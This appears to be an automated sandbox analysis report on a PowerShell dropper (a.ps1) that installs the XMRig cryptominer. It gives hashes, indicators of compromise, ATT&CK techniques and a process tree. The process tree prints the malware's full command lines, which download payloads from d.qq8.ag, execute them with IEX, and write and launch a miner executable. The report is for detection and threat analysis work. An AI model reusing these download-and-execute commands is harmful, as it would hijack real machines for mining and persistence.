xmrig | 608538fcefef29626896925675428811db363e0870f193d253bd7319d264ca7f

Analysis

max time kernel
149s
max time network
139s
platform
windows7_x64
resource
win7v20210410
submitted
07-05-2021 16:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.ps1
Size

8KB
MD5

5999be483bae2a132bc4554620e37cfc
SHA1

bbd9c4dd37b2cd310618ab5f0e5fa56d66ee69aa
SHA256

608538fcefef29626896925675428811db363e0870f193d253bd7319d264ca7f
SHA512

50f507f08e64b171da7f725a6bed7ccc0def006e6da0f3ac97feeb7323ffd699b0228cc1fb7c7c897db90762686a559a5c803373d7eedb61f635c20d0ee253fa

Score

10^/10

xmrig evasion miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.ntele.net

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\m6.bin.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\m6.bin.ori	xmrig
\Users\Admin\AppData\Local\Temp\m6.bin.exe	xmrig
\Users\Admin\AppData\Local\Temp\m6.bin.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\m6.bin.exe	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.EXE

flow pid process

16 1748 powershell.exe
47 1884 powershell.EXE
Executes dropped EXE 4 IoCs

Processes:

JcwMWK4kRFv.exeJcwMWK4kRFv.exeJcwMWK4kRFv.exem6.bin.exe

pid process

1632 JcwMWK4kRFv.exe
1600 JcwMWK4kRFv.exe
1128 JcwMWK4kRFv.exe
3684 m6.bin.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
16	1748	powershell.exe
47	1884	powershell.EXE

pid	process
1632	JcwMWK4kRFv.exe
1600	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
3684	m6.bin.exe

Loads dropped DLL 12 IoCs

Processes:

cmd.exeWerFault.execmd.exetaskmgr.exe

pid	process
1520	cmd.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
656	cmd.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe

Drops file in System32 directory 15 IoCs

Processes:

powershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b9253a21-f6cc-4962-ae63-49a2e7edda13	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd91ddef-2d68-4d02-9fbb-5c2aaf10b0c0	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e3882ae3-3221-4aaa-a85a-1ba640fcda03	powershell.EXE
File created	C:\Windows\System32\Windowspowershell\V1.0\JcwMWK4kRFv.exe	powershell.exe
File opened for modification	C:\Windows\System32\Windowspowershell\V1.0\JcwMWK4kRFv.exe	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3edc5249-6a48-4996-a43b-ffbe9af26423	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c7036b0d-2263-4640-b40c-d4bd104f3c05	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4f2ea9d1-e236-49b6-8bc3-f45029e27640	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b9d2e592-c121-4835-a324-fc19e12f5c71	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b0efdc2-944c-453e-948f-72d459e65f4d	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_006bd474-473d-4e4b-8e25-1bee61417a4b	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d388664b-69f1-4059-b743-3cad47ac72a0	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_040846bc-e0b8-4fa4-9954-49d589e0f199	powershell.EXE

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2932 1600 WerFault.exe JcwMWK4kRFv.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1624 schtasks.exe
364 schtasks.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXE

pid process

2364 NETSTAT.EXE
3608 NETSTAT.EXE

pid	pid_target	process	target process
2932	1600	WerFault.exe	JcwMWK4kRFv.exe

pid	process
1624	schtasks.exe
364	schtasks.exe

pid	process
2364	NETSTAT.EXE
3608	NETSTAT.EXE

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d07ded245c43d701	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeJcwMWK4kRFv.exeJcwMWK4kRFv.exeJcwMWK4kRFv.exepowershell.EXEpowershell.exeWerFault.exe

pid	process
1748	powershell.exe
1128	JcwMWK4kRFv.exe
1632	JcwMWK4kRFv.exe
1600	JcwMWK4kRFv.exe
1600	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1632	JcwMWK4kRFv.exe
1884	powershell.EXE
1884	powershell.EXE
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
2528	powershell.exe
2528	powershell.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
2932	WerFault.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe
1128	JcwMWK4kRFv.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exeJcwMWK4kRFv.exeJcwMWK4kRFv.exeJcwMWK4kRFv.exepowershell.EXENETSTAT.EXEpowershell.exeWerFault.exetaskmgr.exeNETSTAT.EXEm6.bin.exewhoami.exe

description	pid	process
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1128	JcwMWK4kRFv.exe
Token: SeDebugPrivilege	1632	JcwMWK4kRFv.exe
Token: SeDebugPrivilege	1600	JcwMWK4kRFv.exe
Token: SeDebugPrivilege	1884	powershell.EXE
Token: SeDebugPrivilege	2364	NETSTAT.EXE
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	2932	WerFault.exe
Token: SeDebugPrivilege	3596	taskmgr.exe
Token: SeDebugPrivilege	3608	NETSTAT.EXE
Token: SeLockMemoryPrivilege	3684	m6.bin.exe
Token: SeLockMemoryPrivilege	3684	m6.bin.exe
Token: SeDebugPrivilege	3964	whoami.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe
3596	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

powershell.execmd.execmd.execmd.exetaskeng.exeJcwMWK4kRFv.execsc.exe

description	pid	process	target process
PID 1748 wrote to memory of 1520	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 1520	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 1520	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 656	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 656	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 656	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 436	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 436	1748	powershell.exe	cmd.exe
PID 1748 wrote to memory of 436	1748	powershell.exe	cmd.exe
PID 1520 wrote to memory of 1636	1520	cmd.exe	cmd.exe
PID 1520 wrote to memory of 1636	1520	cmd.exe	cmd.exe
PID 1520 wrote to memory of 1636	1520	cmd.exe	cmd.exe
PID 1520 wrote to memory of 1632	1520	cmd.exe	JcwMWK4kRFv.exe
PID 1520 wrote to memory of 1632	1520	cmd.exe	JcwMWK4kRFv.exe
PID 1520 wrote to memory of 1632	1520	cmd.exe	JcwMWK4kRFv.exe
PID 656 wrote to memory of 1496	656	cmd.exe	cmd.exe
PID 656 wrote to memory of 1496	656	cmd.exe	cmd.exe
PID 656 wrote to memory of 1496	656	cmd.exe	cmd.exe
PID 656 wrote to memory of 1600	656	cmd.exe	JcwMWK4kRFv.exe
PID 656 wrote to memory of 1600	656	cmd.exe	JcwMWK4kRFv.exe
PID 656 wrote to memory of 1600	656	cmd.exe	JcwMWK4kRFv.exe
PID 436 wrote to memory of 1588	436	cmd.exe	cmd.exe
PID 436 wrote to memory of 1588	436	cmd.exe	cmd.exe
PID 436 wrote to memory of 1588	436	cmd.exe	cmd.exe
PID 436 wrote to memory of 1128	436	cmd.exe	JcwMWK4kRFv.exe
PID 436 wrote to memory of 1128	436	cmd.exe	JcwMWK4kRFv.exe
PID 436 wrote to memory of 1128	436	cmd.exe	JcwMWK4kRFv.exe
PID 1748 wrote to memory of 1624	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 1624	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 1624	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 364	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 364	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 364	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 1824	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 1824	1748	powershell.exe	schtasks.exe
PID 1748 wrote to memory of 1824	1748	powershell.exe	schtasks.exe
PID 756 wrote to memory of 1884	756	taskeng.exe	powershell.EXE
PID 756 wrote to memory of 1884	756	taskeng.exe	powershell.EXE
PID 756 wrote to memory of 1884	756	taskeng.exe	powershell.EXE
PID 1128 wrote to memory of 2148	1128	JcwMWK4kRFv.exe	csc.exe
PID 1128 wrote to memory of 2148	1128	JcwMWK4kRFv.exe	csc.exe
PID 1128 wrote to memory of 2148	1128	JcwMWK4kRFv.exe	csc.exe
PID 2148 wrote to memory of 2168	2148	csc.exe	cvtres.exe
PID 2148 wrote to memory of 2168	2148	csc.exe	cvtres.exe
PID 2148 wrote to memory of 2168	2148	csc.exe	cvtres.exe
PID 1128 wrote to memory of 2200	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2200	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2200	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2220	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2220	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2220	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2240	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2240	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2240	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2260	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2260	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2260	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2324	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2324	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2324	1128	JcwMWK4kRFv.exe	nslookup.exe
PID 1128 wrote to memory of 2364	1128	JcwMWK4kRFv.exe	NETSTAT.EXE
PID 1128 wrote to memory of 2364	1128	JcwMWK4kRFv.exe	NETSTAT.EXE
PID 1128 wrote to memory of 2364	1128	JcwMWK4kRFv.exe	NETSTAT.EXE
PID 1128 wrote to memory of 2408	1128	JcwMWK4kRFv.exe	sc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\a.ps1
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='842c31c85b972db52eba0e2470e87184';$ifp=$env:tmp+'\if.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/if.bin?^^^&MRBKYMNO^^^&00000000-0000-0000-0000-000000000000^^^&7A:E6:55:05:2A:65');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)|JcwMWK4kRFv.exe -
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='842c31c85b972db52eba0e2470e87184';$ifp=$env:tmp+'\if.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/if.bin?^&MRBKYMNO^&00000000-0000-0000-0000-000000000000^&7A:E6:55:05:2A:65');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"
3⤵
PID:1636

C:\Windows\System32\WindowsPowerShell\v1.0\JcwMWK4kRFv.exe
JcwMWK4kRFv.exe -
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kkmpaig4\kkmpaig4.cmdline"
4⤵
PID:2944

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES843D.tmp" "c:\Users\Admin\AppData\Local\Temp\kkmpaig4\CSCB69E2D7C47194FDD8EBEB3AC8DF4B9BA.TMP"
5⤵
PID:2784

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u21ekmeb\u21ekmeb.cmdline"
4⤵
PID:2500

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES864F.tmp" "c:\Users\Admin\AppData\Local\Temp\u21ekmeb\CSC735ABA0D214A4D679AA4CDF78BF23EE.TMP"
5⤵
PID:3020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pe223hlc\pe223hlc.cmdline"
5⤵
PID:2464

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA821.tmp" "c:\Users\Admin\AppData\Local\Temp\pe223hlc\CSC156463B32A9D487D8781712CC15E868.TMP"
6⤵
PID:2672

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\szcdx3rn\szcdx3rn.cmdline"
4⤵
PID:3332

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES980B.tmp" "c:\Users\Admin\AppData\Local\Temp\szcdx3rn\CSC6C17C3CB92A7448B9CFDA53786B67CD1.TMP"
5⤵
PID:3348

C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe" /user
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/m6.bin?^^^&MRBKYMNO^^^&00000000-0000-0000-0000-000000000000^^^&7A:E6:55:05:2A:65');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};iex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|JcwMWK4kRFv.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:656

C:\Windows\System32\WindowsPowerShell\v1.0\JcwMWK4kRFv.exe
JcwMWK4kRFv.exe -
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1600 -s 1948
4⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/m6.bin?^&MRBKYMNO^&00000000-0000-0000-0000-000000000000^&7A:E6:55:05:2A:65');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};iex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"
3⤵
PID:1496

C:\Windows\system32\cmd.exe
cmd /c copy /y C:\Users\Admin\AppData\Local\Temp\m6.bin.ori C:\Users\Admin\AppData\Local\Temp\m6.bin.exe
3⤵
PID:3632

C:\Users\Admin\AppData\Local\Temp\m6.bin.exe
C:\Users\Admin\AppData\Local\Temp\m6.bin.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3684

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='5a275a03a92b0631134fdaa8ebba683c';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.qq8.ag';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient).downloaddata($down_url+'/kr.bin?^^^&MRBKYMNO^^^&00000000-0000-0000-0000-000000000000^^^&7A:E6:55:05:2A:65');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)|JcwMWK4kRFv.exe -
2⤵
- Suspicious use of WriteProcessMemory
PID:436

C:\Windows\System32\WindowsPowerShell\v1.0\JcwMWK4kRFv.exe
JcwMWK4kRFv.exe -
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sth3awg3\sth3awg3.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
